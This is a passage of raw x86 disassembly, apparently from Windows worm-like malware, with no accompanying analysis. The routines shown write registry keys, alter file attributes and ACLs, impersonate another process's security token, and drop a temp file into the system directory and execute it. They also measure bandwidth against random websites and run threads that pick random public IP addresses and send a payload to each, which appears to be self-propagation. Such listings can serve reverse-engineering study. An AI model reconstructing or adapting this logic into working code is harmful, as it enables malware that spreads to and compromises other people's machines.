mov [ebp+var_8], eax
call esi ; GetModuleHandleA
push eax ; hModule
call edi ; GetProcAddress
mov esi, eax
xor eax, eax
cmp [ebp+var_8], eax
jz short loc_9AD05A
cmp esi, eax
jz short loc_9AD05A
push eax
push 4
mov [ebp+var_4], eax
lea eax, [ebp+var_4]
push eax
push 22h
push 0FFFFFFFFh
call [ebp+var_8]
test eax, eax
jl short loc_9AD05A
or [ebp+var_4], 70h
push 4
lea eax, [ebp+var_4]
push eax
push 22h
push 0FFFFFFFFh
call esi
loc_9AD05A: ; CODE XREF: sub_9ACFF6+39�j
; sub_9ACFF6+3D�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_9ACFF6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AD05F(HKEY hKey,LPCSTR lpSubKey,LPCSTR lpValueName,BYTE *lpData,DWORD cbData,DWORD dwType)
sub_9AD05F proc near ; CODE XREF: sub_9AD0F4+15�p
phkResult = dword ptr -4
hKey = dword ptr 8
lpSubKey = dword ptr 0Ch
lpValueName = dword ptr 10h
lpData = dword ptr 14h
cbData = dword ptr 18h
dwType = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
push esi
lea eax, [ebp+phkResult]
push eax ; phkResult
push 20006h ; samDesired
xor esi, esi
push esi ; ulOptions
push [ebp+lpSubKey] ; lpSubKey
push [ebp+hKey] ; hKey
call RegOpenKeyExA
test eax, eax
jnz short loc_9AD0A4
push [ebp+cbData] ; cbData
push [ebp+lpData] ; lpData
push [ebp+dwType] ; dwType
push esi ; Reserved
push [ebp+lpValueName] ; lpValueName
push [ebp+phkResult] ; hKey
call RegSetValueExA
test eax, eax
jnz short loc_9AD09B
inc esi
loc_9AD09B: ; CODE XREF: sub_9AD05F+39�j
push [ebp+phkResult] ; hKey
call RegCloseKey
loc_9AD0A4: ; CODE XREF: sub_9AD05F+1F�j
mov eax, esi
pop esi
leave
retn
sub_9AD05F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AD0A9(int,LPCSTR lpSubKey,LPCSTR lpValueName,LPBYTE lpData,DWORD cbData)
sub_9AD0A9 proc near ; CODE XREF: sub_9AD112+12�p
hKey = dword ptr -4
lpSubKey = dword ptr 0Ch
lpValueName = dword ptr 10h
lpData = dword ptr 14h
cbData = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push esi
lea eax, [ebp+hKey]
push eax ; phkResult
push 20019h ; samDesired
xor esi, esi
push esi ; ulOptions
push [ebp+lpSubKey] ; lpSubKey
push 80000002h ; hKey
call RegOpenKeyExA
test eax, eax
jnz short loc_9AD0EF
lea eax, [ebp+cbData]
push eax ; lpcbData
push [ebp+lpData] ; lpData
push esi ; lpType
push esi ; lpReserved
push [ebp+lpValueName] ; lpValueName
push [ebp+hKey] ; hKey
call RegQueryValueExA
test eax, eax
jnz short loc_9AD0E6
inc esi
loc_9AD0E6: ; CODE XREF: sub_9AD0A9+3A�j
push [ebp+hKey] ; hKey
call RegCloseKey
loc_9AD0EF: ; CODE XREF: sub_9AD0A9+21�j
mov eax, esi
pop esi
leave
retn
sub_9AD0A9 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9AD0F4(HKEY hKey,LPCSTR lpSubKey,LPCSTR lpValueName,BYTE Data)
sub_9AD0F4 proc near ; CODE XREF: sub_9A7170+82�p
; sub_9A91B5+17�p ...
hKey = dword ptr 4
lpSubKey = dword ptr 8
lpValueName = dword ptr 0Ch
Data = byte ptr 10h
push 4 ; dwType
push 4 ; cbData
lea eax, [esp+8+Data]
push eax ; lpData
push [esp+0Ch+lpValueName] ; lpValueName
push [esp+10h+lpSubKey] ; lpSubKey
push [esp+14h+hKey] ; hKey
call sub_9AD05F
add esp, 18h
retn
sub_9AD0F4 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9AD112(int,LPCSTR lpSubKey,LPCSTR lpValueName,LPBYTE lpData)
sub_9AD112 proc near ; CODE XREF: sub_9A7170+5F�p
; sub_9A91E7+24�p ...
arg_0 = dword ptr 4
lpSubKey = dword ptr 8
lpValueName = dword ptr 0Ch
lpData = dword ptr 10h
push 4 ; cbData
push [esp+4+lpData] ; lpData
push [esp+8+lpValueName] ; lpValueName
push [esp+0Ch+lpSubKey] ; lpSubKey
push [esp+10h+arg_0] ; int
call sub_9AD0A9
add esp, 14h
retn
sub_9AD112 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9AD12D(LPCSTR lpFileName,int)
sub_9AD12D proc near ; CODE XREF: sub_9ABB9F+32E�p
; sub_9AD15E+2E�p ...
lpFileName = dword ptr 4
arg_4 = dword ptr 8
push [esp+lpFileName] ; lpFileName
call GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short locret_9AD15D
cmp [esp+arg_4], 0
jz short loc_9AD14D
test al, 1
jz short locret_9AD15D
and eax, 26h
push eax
jmp short loc_9AD153
; ---------------------------------------------------------------------------
loc_9AD14D: ; CODE XREF: sub_9AD12D+14�j
test al, 1
jnz short locret_9AD15D
push 7 ; dwFileAttributes
loc_9AD153: ; CODE XREF: sub_9AD12D+1E�j
push [esp+4+lpFileName] ; lpFileName
call SetFileAttributesA
locret_9AD15D: ; CODE XREF: sub_9AD12D+D�j
; sub_9AD12D+18�j ...
retn
sub_9AD12D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AD15E(LPCSTR lpFileName,int)
sub_9AD15E proc near ; CODE XREF: sub_9A752A+6B�p
; sub_9A7670+26�p ...
pSecurityDescriptor= byte ptr -44h
pIdentifierAuthority= _SID_IDENTIFIER_AUTHORITY ptr -30h
nAclLength = dword ptr -28h
var_24 = dword ptr -24h
pSid = dword ptr -20h
hMem = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
lpFileName = dword ptr 8
arg_4 = dword ptr 0Ch
push 34h
push offset stru_9A4450
call __SEH_prolog
xor ebx, ebx
mov [ebp+var_24], ebx
mov [ebp+hMem], ebx
mov [ebp+pSid], ebx
mov [ebp+ms_exc.disabled], ebx
mov edi, [ebp+arg_4]
mov eax, edi
mov esi, 120116h
and eax, esi
cmp eax, esi
jz short loc_9AD193
push ebx ; int
push [ebp+lpFileName] ; lpFileName
call sub_9AD12D
pop ecx
pop ecx
loc_9AD193: ; CODE XREF: sub_9AD15E+28�j
mov [ebp+pIdentifierAuthority.Value], bl
mov [ebp+pIdentifierAuthority.Value+1], bl
mov [ebp+pIdentifierAuthority.Value+2], bl
mov [ebp+pIdentifierAuthority.Value+3], bl
mov [ebp+pIdentifierAuthority.Value+4], bl
mov [ebp+pIdentifierAuthority.Value+5], 1
push 1 ; dwRevision
lea eax, [ebp+pSecurityDescriptor]
push eax ; pSecurityDescriptor
call InitializeSecurityDescriptor
lea eax, [ebp+pSid]
push eax ; pSid
push ebx ; nSubAuthority7
push ebx ; nSubAuthority6
push ebx ; nSubAuthority5
push ebx ; nSubAuthority4
push ebx ; nSubAuthority3
push ebx ; nSubAuthority2
push ebx ; nSubAuthority1
push ebx ; nSubAuthority0
push 1 ; nSubAuthorityCount
lea eax, [ebp+pIdentifierAuthority]
push eax ; pIdentifierAuthority
call AllocateAndInitializeSid
push [ebp+pSid] ; pSid
call GetLengthSid
add eax, 10h
mov [ebp+nAclLength], eax
push eax ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov [ebp+hMem], eax
cmp eax, ebx
jz short loc_9AD241
or edi, 100000h
mov [ebp+arg_4], edi
push 2 ; dwAclRevision
push [ebp+nAclLength] ; nAclLength
push eax ; pAcl
call InitializeAcl
push [ebp+pSid] ; pSid
push edi ; AccessMask
push 2 ; dwAceRevision
push [ebp+hMem] ; pAcl
call AddAccessAllowedAce
push ebx ; bDaclDefaulted
push [ebp+hMem] ; pDacl
push 1 ; bDaclPresent
lea eax, [ebp+pSecurityDescriptor]
push eax ; pSecurityDescriptor
call SetSecurityDescriptorDacl
lea eax, [ebp+pSecurityDescriptor]
push eax ; pSecurityDescriptor
push 4 ; SecurityInformation
push [ebp+lpFileName] ; lpFileName
call SetFileSecurityA
mov [ebp+var_24], eax
and edi, esi
cmp edi, esi
jnz short loc_9AD241
push 1 ; int
push [ebp+lpFileName] ; lpFileName
call sub_9AD12D
pop ecx
pop ecx
loc_9AD241: ; CODE XREF: sub_9AD15E+89�j
; sub_9AD15E+D5�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_9AD254
; ---------------------------------------------------------------------------
loc_9AD247: ; DATA XREF: .text:stru_9A4450�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AD24B: ; DATA XREF: .text:stru_9A4450�o
mov esp, [ebp+ms_exc.old_esp]
or [ebp+ms_exc.disabled], 0FFFFFFFFh
xor ebx, ebx
loc_9AD254: ; CODE XREF: sub_9AD15E+E7�j
cmp [ebp+hMem], ebx
jz short loc_9AD262
push [ebp+hMem] ; hMem
call GlobalFree
loc_9AD262: ; CODE XREF: sub_9AD15E+F9�j
cmp [ebp+pSid], ebx
jz short loc_9AD270
push [ebp+pSid] ; pSid
call FreeSid
loc_9AD270: ; CODE XREF: sub_9AD15E+107�j
mov eax, [ebp+var_24]
call __SEH_epilog
retn
sub_9AD15E endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9AD279(char *Source,char *Str)
sub_9AD279 proc near ; CODE XREF: sub_9A722A+31�p
Source = dword ptr 4
Str = dword ptr 8
push esi
push [esp+4+Source] ; Source
mov esi, [esp+8+Str]
push esi ; Dest
call strcpy
push 5Ch ; Ch
push esi ; Str
call strrchr
add esp, 10h
test eax, eax
jz short loc_9AD29D
mov byte ptr [eax], 0
pop esi
retn
; ---------------------------------------------------------------------------
loc_9AD29D: ; CODE XREF: sub_9AD279+1D�j
push esi ; lpBuffer
push 104h ; nBufferLength
call GetCurrentDirectoryA
push esi ; Str
call strlen
cmp byte ptr [eax+esi-1], 5Ch
pop ecx
jnz short loc_9AD2C3
push esi ; Str
call strlen
pop ecx
mov byte ptr [eax+esi-1], 0
loc_9AD2C3: ; CODE XREF: sub_9AD279+3C�j
pop esi
retn
sub_9AD279 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9AD2C5(char *Str,int,int)
sub_9AD2C5 proc near ; CODE XREF: sub_9A8E01+F3�p
; sub_9AFD0A+60�p
Str = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push [esp+Str] ; Str
call strlen
pop ecx
mov ecx, [esp+arg_8]
dec ecx
cmp eax, ecx
jbe short loc_9AD2DB
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_9AD2DB: ; CODE XREF: sub_9AD2C5+11�j
test eax, eax
mov ecx, [esp+arg_4]
mov byte ptr [eax+ecx], 0
jbe short loc_9AD30E
mov edx, [esp+Str]
push esi
sub edx, ecx
mov esi, eax
loc_9AD2F0: ; CODE XREF: sub_9AD2C5+46�j
mov al, [edx+ecx]
cmp al, 7Ah
jnz short loc_9AD2FC
mov byte ptr [ecx], 61h
jmp short loc_9AD309
; ---------------------------------------------------------------------------
loc_9AD2FC: ; CODE XREF: sub_9AD2C5+30�j
cmp al, 5Ah
jnz short loc_9AD305
mov byte ptr [ecx], 41h
jmp short loc_9AD309
; ---------------------------------------------------------------------------
loc_9AD305: ; CODE XREF: sub_9AD2C5+39�j
inc al
mov [ecx], al
loc_9AD309: ; CODE XREF: sub_9AD2C5+35�j
; sub_9AD2C5+3E�j
inc ecx
dec esi
jnz short loc_9AD2F0
pop esi
loc_9AD30E: ; CODE XREF: sub_9AD2C5+20�j
xor eax, eax
inc eax
retn
sub_9AD2C5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AD312(char *Str1)
sub_9AD312 proc near ; CODE XREF: sub_9A9067+38�p
Str = byte ptr -8
var_4 = dword ptr -4
Str1 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, dword_9A26A4
mov dword ptr [ebp+Str], eax
mov eax, dword_9A26A8
push esi
mov esi, [ebp+Str1]
mov [ebp+var_4], eax
push 7 ; MaxCount
lea eax, [ebp+Str]
push eax ; Str
push esi ; Str1
call _strnicmp
add esp, 0Ch
test eax, eax
jz short loc_9AD343
xor eax, eax
jmp short loc_9AD3A4
; ---------------------------------------------------------------------------
loc_9AD343: ; CODE XREF: sub_9AD312+2B�j
push ebx
push edi
lea ebx, [esi+7]
push 3Ah ; Val
push ebx ; Str
call strchr
test eax, eax
pop ecx
pop ecx
jz short loc_9AD35B
sub eax, ebx
jmp short loc_9AD362
; ---------------------------------------------------------------------------
loc_9AD35B: ; CODE XREF: sub_9AD312+43�j
push ebx ; Str
call strlen
pop ecx
loc_9AD362: ; CODE XREF: sub_9AD312+47�j
mov edi, eax
lea eax, [edi+1]
push eax ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov esi, eax
test esi, esi
jz short loc_9AD3A2
lea eax, [edi+1]
push eax ; Count
push ebx ; Source
push esi ; Dest
call strncpy
add esp, 0Ch
push esi ; cp
mov byte ptr [esi+edi], 0
call __imp_inet_addr
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_9AD399
xor edi, edi
loc_9AD399: ; CODE XREF: sub_9AD312+83�j
push esi ; hMem
call GlobalFree
mov eax, edi
loc_9AD3A2: ; CODE XREF: sub_9AD312+62�j
pop edi
pop ebx
loc_9AD3A4: ; CODE XREF: sub_9AD312+2F�j
pop esi
leave
retn
sub_9AD312 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AD3A7(LPSTR lpCommandLine,int)
sub_9AD3A7 proc near ; CODE XREF: sub_9A752A+137�p
; sub_9AC1ED+C4�p ...
StartupInfo = _STARTUPINFOA ptr -54h
hObject = _PROCESS_INFORMATION ptr -10h
lpCommandLine = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
xor edx, edx
xor eax, eax
mov [ebp+hObject.hProcess], edx
push 10h
lea edi, [ebp+hObject.hThread]
stosd
stosd
stosd
pop ecx
xor eax, eax
mov [ebp+StartupInfo.cb], 44h
lea edi, [ebp+StartupInfo.lpReserved]
rep stosd
mov eax, [ebp+arg_4]
xor edi, edi
inc edi
xor esi, esi
neg eax
sbb eax, eax
and eax, 5
mov [ebp+StartupInfo.wShowWindow], ax
lea eax, [ebp+hObject]
push eax ; lpProcessInformation
lea eax, [ebp+StartupInfo]
push eax ; lpStartupInfo
push edx ; lpCurrentDirectory
push edx ; lpEnvironment
push edx ; dwCreationFlags
push edx ; bInheritHandles
push edx ; lpThreadAttributes
push edx ; lpProcessAttributes
push [ebp+lpCommandLine] ; lpCommandLine
mov [ebp+StartupInfo.dwFlags], edi
push edx ; lpApplicationName
call CreateProcessA
test eax, eax
jz short loc_9AD411
push [ebp+hObject.hProcess] ; hObject
mov esi, CloseHandle
call esi ; CloseHandle
push [ebp+hObject.hThread] ; hObject
call esi ; CloseHandle
mov esi, edi
loc_9AD411: ; CODE XREF: sub_9AD3A7+56�j
pop edi
mov eax, esi
pop esi
leave
retn
sub_9AD3A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AD417 proc near ; CODE XREF: sub_9A993B+6�p
; sub_9ABB9F+20�p
hObject = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push offset dword_9A14B0 ; Str2
xor ebx, ebx
call sub_9ACC1F
cmp eax, ebx
pop ecx
jz short loc_9AD46E
push edi
push eax ; dwProcessId
push ebx ; bInheritHandle
push 410h ; dwDesiredAccess
call OpenProcess
mov edi, eax
cmp edi, ebx
jz short loc_9AD46D
push esi
lea eax, [ebp+hObject]
push eax ; TokenHandle
push 0Eh ; DesiredAccess
push edi ; ProcessHandle
call OpenProcessToken
test eax, eax
mov esi, CloseHandle
jz short loc_9AD469
push [ebp+hObject] ; hToken
call ImpersonateLoggedOnUser
push [ebp+hObject] ; hObject
mov ebx, eax
call esi ; CloseHandle
loc_9AD469: ; CODE XREF: sub_9AD417+40�j
push edi ; hObject
call esi ; CloseHandle
pop esi
loc_9AD46D: ; CODE XREF: sub_9AD417+28�j
pop edi
loc_9AD46E: ; CODE XREF: sub_9AD417+14�j
mov eax, ebx
pop ebx
leave
retn
sub_9AD417 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AD473(LPCVOID lpBuffer,DWORD nNumberOfBytesToWrite)
sub_9AD473 proc near ; CODE XREF: sub_9A89A9+90�p
; sub_9AEA47+38�p
FileName = byte ptr -210h
PathName = byte ptr -10Ch
var_9 = byte ptr -9
NumberOfBytesWritten= dword ptr -8
var_4 = dword ptr -4
lpBuffer = dword ptr 8
nNumberOfBytesToWrite= dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 210h
and [ebp+var_4], 0
push ebx
push esi
push edi
mov ebx, 104h
push ebx ; uSize
lea eax, [ebp+PathName]
push eax ; lpBuffer
call GetSystemDirectoryA
mov esi, GetTempFileNameA
lea eax, [ebp+FileName]
push eax ; lpTempFileName
push 0 ; uUnique
mov edi, offset PrefixString ; "ror"
push edi ; lpPrefixString
lea eax, [ebp+PathName]
push eax ; lpPathName
mov [ebp+var_9], 0
call esi ; GetTempFileNameA
test eax, eax
jnz short loc_9AD4E4
lea eax, [ebp+PathName]
push eax ; lpBuffer
push ebx ; nBufferLength
call GetTempPathA
lea eax, [ebp+FileName]
push eax ; lpTempFileName
xor ebx, ebx
push ebx ; uUnique
push edi ; lpPrefixString
lea eax, [ebp+PathName]
push eax ; lpPathName
mov [ebp+var_9], 0
call esi ; GetTempFileNameA
jmp short loc_9AD4E6
; ---------------------------------------------------------------------------
loc_9AD4E4: ; CODE XREF: sub_9AD473+47�j
xor ebx, ebx
loc_9AD4E6: ; CODE XREF: sub_9AD473+6F�j
push ebx ; hTemplateFile
push ebx ; dwFlagsAndAttributes
push 2 ; dwCreationDisposition
push ebx ; lpSecurityAttributes
push 2 ; dwShareMode
push 40000000h ; dwDesiredAccess
lea eax, [ebp+FileName]
push eax ; lpFileName
call CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_9AD54B
mov esi, [ebp+nNumberOfBytesToWrite]
push ebx ; lpOverlapped
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
push esi ; nNumberOfBytesToWrite
push [ebp+lpBuffer] ; lpBuffer
mov [ebp+NumberOfBytesWritten], ebx
push edi ; hFile
call WriteFile
push edi ; hObject
call CloseHandle
cmp [ebp+NumberOfBytesWritten], esi
lea eax, [ebp+FileName]
jnz short loc_9AD544
push ebx ; int
push eax ; lpCommandLine
call sub_9AD3A7
test eax, eax
pop ecx
pop ecx
jz short loc_9AD54B
mov [ebp+var_4], 1
jmp short loc_9AD54B
; ---------------------------------------------------------------------------
loc_9AD544: ; CODE XREF: sub_9AD473+B9�j
push eax ; lpFileName
call DeleteFileA
loc_9AD54B: ; CODE XREF: sub_9AD473+91�j
; sub_9AD473+C6�j ...
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_9AD473 endp
; =============== S U B R O U T I N E =======================================
sub_9AD553 proc near ; CODE XREF: sub_9AD6D4+7A�p
push 1 ; Comperand
push 0 ; Exchange
push offset Destination ; Destination
call InterlockedCompareExchange
dec eax
neg eax
sbb eax, eax
inc eax
retn
sub_9AD553 endp
; =============== S U B R O U T I N E =======================================
sub_9AD569 proc near ; CODE XREF: StartAddress+1D3�p
; sub_9A8FC6+3A�p
push esi
mov esi, InterlockedCompareExchange
push edi
mov edi, offset Destination
jmp short loc_9AD580
; ---------------------------------------------------------------------------
loc_9AD578: ; CODE XREF: sub_9AD569+21�j
push 64h ; dwMilliseconds
call Sleep
loc_9AD580: ; CODE XREF: sub_9AD569+D�j
push 0 ; Comperand
push 1 ; Exchange
push edi ; Destination
call esi ; InterlockedCompareExchange
cmp eax, 1
jnz short loc_9AD578
pop edi
pop esi
retn
sub_9AD569 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AD58F proc near ; CODE XREF: sub_9AD627:loc_9AD663�p
; sub_9AD627:loc_9AD67E�p
szUrl = byte ptr -2Ch
var_D = byte ptr -0Dh
dwFlags = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 2Ch
push edi
xor edi, edi
call rand
push 5
pop ecx
xor edx, edx
div ecx
lea eax, [ebp+szUrl]
push off_9BAAB4[edx*4]
push offset aHttpWww_S ; "http://www.%s"
push 20h ; Count
push eax ; Dest
call _snprintf
add esp, 10h
push edi ; dwReserved
lea eax, [ebp+dwFlags]
push eax ; lpdwFlags
mov [ebp+var_D], 0
call InternetGetConnectedState
test eax, eax
jz short loc_9AD622
push ebx
push esi
mov esi, GetTickCount
mov [ebp+var_4], edi
call esi ; GetTickCount
mov [ebp+var_8], eax
push 1 ; int
lea eax, [ebp+var_4]
push eax ; int
lea eax, [ebp+szUrl]
push eax ; lpszUrl
call sub_9ACAC1
add esp, 0Ch
mov ebx, eax
call esi ; GetTickCount
mov esi, eax
sub esi, [ebp+var_8]
test ebx, ebx
jz short loc_9AD620
push ebx ; hMem
call GlobalFree
test esi, esi
jz short loc_9AD620
mov eax, [ebp+var_4]
test eax, eax
jz short loc_9AD620
xor edx, edx
div esi
mov edi, eax
imul edi, 3E8h
loc_9AD620: ; CODE XREF: sub_9AD58F+71�j
; sub_9AD58F+7C�j ...
pop esi
pop ebx
loc_9AD622: ; CODE XREF: sub_9AD58F+42�j
mov eax, edi
pop edi
leave
retn
sub_9AD58F endp
; =============== S U B R O U T I N E =======================================
sub_9AD627 proc near ; CODE XREF: sub_9AD831+A�p
; sub_9AD831+28�p
var_C = dword ptr -0Ch
dwFlags = dword ptr -8
var_4 = dword ptr -4
sub esp, 0Ch
push ebx
push ebp
xor ebx, ebx
push ebx ; dwReserved
lea eax, [esp+18h+dwFlags]
push eax ; lpdwFlags
xor ebp, ebp
call InternetGetConnectedState
test eax, eax
jz loc_9AD6CC
mov al, byte ptr [esp+14h+dwFlags]
and al, 1
neg al
push esi
mov esi, Sleep
push edi
mov edi, 0BB8h
sbb eax, eax
and eax, 0FFFFFFA4h
add eax, 64h
mov ebp, eax
loc_9AD663: ; CODE XREF: sub_9AD627+50�j
call sub_9AD58F
test eax, eax
mov [esp+1Ch+var_4], eax
jnz short loc_9AD679
push edi ; dwMilliseconds
call esi ; Sleep
inc ebx
cmp ebx, 5
jl short loc_9AD663
loc_9AD679: ; CODE XREF: sub_9AD627+47�j
and [esp+1Ch+var_C], 0
loc_9AD67E: ; CODE XREF: sub_9AD627+6E�j
call sub_9AD58F
mov ebx, eax
test ebx, ebx
jnz short loc_9AD697
push edi ; dwMilliseconds
call esi ; Sleep
inc [esp+1Ch+var_C]
cmp [esp+1Ch+var_C], 5
jl short loc_9AD67E
loc_9AD697: ; CODE XREF: sub_9AD627+60�j
mov eax, [esp+1Ch+var_4]
test eax, eax
pop edi
pop esi
jz short loc_9AD6CC
test ebx, ebx
jz short loc_9AD6CC
add eax, ebx
push 6
shr eax, 1
xor edx, edx
pop ecx
div ecx
push 2Ch
xor edx, edx
pop ecx
div ecx
mov ebp, eax
mov eax, 190h
cmp ebp, eax
jbe short loc_9AD6C4
mov ebp, eax
loc_9AD6C4: ; CODE XREF: sub_9AD627+99�j
cmp ebp, 8
jnb short loc_9AD6CC
push 8
pop ebp
loc_9AD6CC: ; CODE XREF: sub_9AD627+17�j
; sub_9AD627+78�j ...
mov eax, ebp
pop ebp
pop ebx
add esp, 0Ch
retn
sub_9AD627 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_9AD6D4(LPVOID)
sub_9AD6D4 proc near ; DATA XREF: sub_9AD831+58�o
var_2C = dword ptr -2Ch
dwFlags = dword ptr -28h
Size = dword ptr -24h
Src = dword ptr -20h
netlong = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 1Ch
push offset stru_9A44A0
call __SEH_prolog
mov ebx, [ebp+arg_0]
push offset Addend ; lpAddend
call InterlockedIncrement
cmp dword_9BB2B0, eax
jb loc_9AD81C
and [ebp+ms_exc.disabled], 0
call sub_9AC50B
push dword ptr [ebx+10h]
push dword ptr [ebx+4]
lea eax, [ebp+Size]
push eax
lea eax, [ebp+Src]
push eax
call sub_9AA646
add esp, 10h
test eax, eax
jz loc_9AD818
mov edi, 102h
mov esi, WaitForSingleObject
loc_9AD72C: ; CODE XREF: sub_9AD6D4+11A�j
; sub_9AD6D4+12D�j
push 0 ; dwMilliseconds
push dword ptr [ebx] ; hHandle
call esi ; WaitForSingleObject
cmp eax, edi
jnz loc_9AD806
loc_9AD73A: ; CODE XREF: sub_9AD6D4+106�j
push 0 ; dwReserved
lea eax, [ebp+dwFlags]
push eax ; lpdwFlags
call InternetGetConnectedState
test eax, eax
jz loc_9AD7E0
call sub_9AD553
test eax, eax
jz short loc_9AD764
push [ebp+Size] ; Size
push [ebp+Src] ; Src
call sub_9A8F60
pop ecx
pop ecx
loc_9AD764: ; CODE XREF: sub_9AD6D4+81�j
; sub_9AD6D4+A8�j ...
call rand
mov word ptr [ebp+netlong], ax
call rand
mov word ptr [ebp+netlong+2], ax
cmp byte ptr [ebp+netlong], 0Bh
jb short loc_9AD764
cmp byte ptr [ebp+netlong], 0F0h
ja short loc_9AD764
cmp byte ptr [ebp+netlong+1], 0FEh
ja short loc_9AD764
cmp al, 0FEh
ja short loc_9AD764
cmp byte ptr [ebp+netlong+3], 1
jb short loc_9AD764
cmp byte ptr [ebp+netlong+3], 0FEh
ja short loc_9AD764
push [ebp+netlong]
call sub_9AC3B1
pop ecx
test eax, eax
jz short loc_9AD764
push [ebp+netlong]
call sub_9AC384
pop ecx
test eax, eax
jz short loc_9AD764
mov eax, [ebp+netlong]
mov [ebp+var_2C], eax
cmp eax, [ebx+4]
jz short loc_9AD7CE
push [ebp+Size] ; Size
push [ebp+Src] ; Src
push eax ; netlong
call sub_9AABAE
add esp, 0Ch
loc_9AD7CE: ; CODE XREF: sub_9AD6D4+E9�j
push dwMilliseconds ; dwMilliseconds
push dword ptr [ebx] ; hHandle
call esi ; WaitForSingleObject
cmp eax, edi
jz loc_9AD73A
loc_9AD7E0: ; CODE XREF: sub_9AD6D4+74�j
; sub_9AD6D4+12B�j
push 0 ; dwReserved
lea eax, [ebp+dwFlags]
push eax ; lpdwFlags
call InternetGetConnectedState
test eax, eax
jnz loc_9AD72C
push 3E8h ; dwMilliseconds
push dword ptr [ebx] ; hHandle
call esi ; WaitForSingleObject
cmp eax, edi
jz short loc_9AD7E0
jmp loc_9AD72C
; ---------------------------------------------------------------------------
loc_9AD806: ; CODE XREF: sub_9AD6D4+60�j
push [ebp+Src] ; hMem
call GlobalFree
jmp short loc_9AD818
; ---------------------------------------------------------------------------
loc_9AD811: ; DATA XREF: .text:stru_9A44A0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AD815: ; DATA XREF: .text:stru_9A44A0�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AD818: ; CODE XREF: sub_9AD6D4+47�j
; sub_9AD6D4+13B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_9AD81C: ; CODE XREF: sub_9AD6D4+20�j
push offset Addend ; lpAddend
call InterlockedDecrement
xor eax, eax
call __SEH_epilog
retn 4
sub_9AD6D4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_9AD831(LPVOID)
sub_9AD831 proc near ; DATA XREF: sub_9ADBF1+369�o
ThreadId = dword ptr 8
push ebp
mov ebp, esp
push esi
push edi
call sub_9AC50B
call sub_9AD627
mov edi, [ebp+ThreadId]
jmp short loc_9AD85E
; ---------------------------------------------------------------------------
loc_9AD845: ; CODE XREF: sub_9AD831+31�j
push 3E8h ; dwMilliseconds
push dword ptr [edi] ; hHandle
call WaitForSingleObject
cmp eax, 102h
jnz short loc_9AD8B4
call sub_9AD627
loc_9AD85E: ; CODE XREF: sub_9AD831+12�j
mov esi, eax
test esi, esi
jz short loc_9AD845
push ebx
push 3
pop ecx
xor edx, edx
div ecx
push eax ; Value
push offset Target ; Target
call InterlockedExchange
test esi, esi
mov ebx, CloseHandle
jbe short loc_9AD89E
loc_9AD882: ; CODE XREF: sub_9AD831+6B�j
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push 0 ; dwCreationFlags
push edi ; lpParameter
push offset sub_9AD6D4 ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call CreateThread
push eax ; hObject
call ebx ; CloseHandle
dec esi
jnz short loc_9AD882
loc_9AD89E: ; CODE XREF: sub_9AD831+4F�j
push 0FFFFFFFFh ; dwMilliseconds
push dword ptr [edi] ; hHandle
call WaitForSingleObject
push dword ptr [edi] ; hObject
call ebx ; CloseHandle
push edi ; hMem
call GlobalFree
pop ebx
loc_9AD8B4: ; CODE XREF: sub_9AD831+26�j
pop edi
xor eax, eax
pop esi
pop ebp
retn 4
sub_9AD831 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_9AD8BC(LPVOID)
sub_9AD8BC proc near ; DATA XREF: sub_9ADA44+10C�o
; sub_9ADBF1+20F�o
var_30 = dword ptr -30h
dwFlags = dword ptr -2Ch
Size = dword ptr -28h
Src = dword ptr -24h
netlong = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 20h
push offset stru_9A44B0
call __SEH_prolog
mov esi, [ebp+arg_0]
mov [ebp+var_30], esi
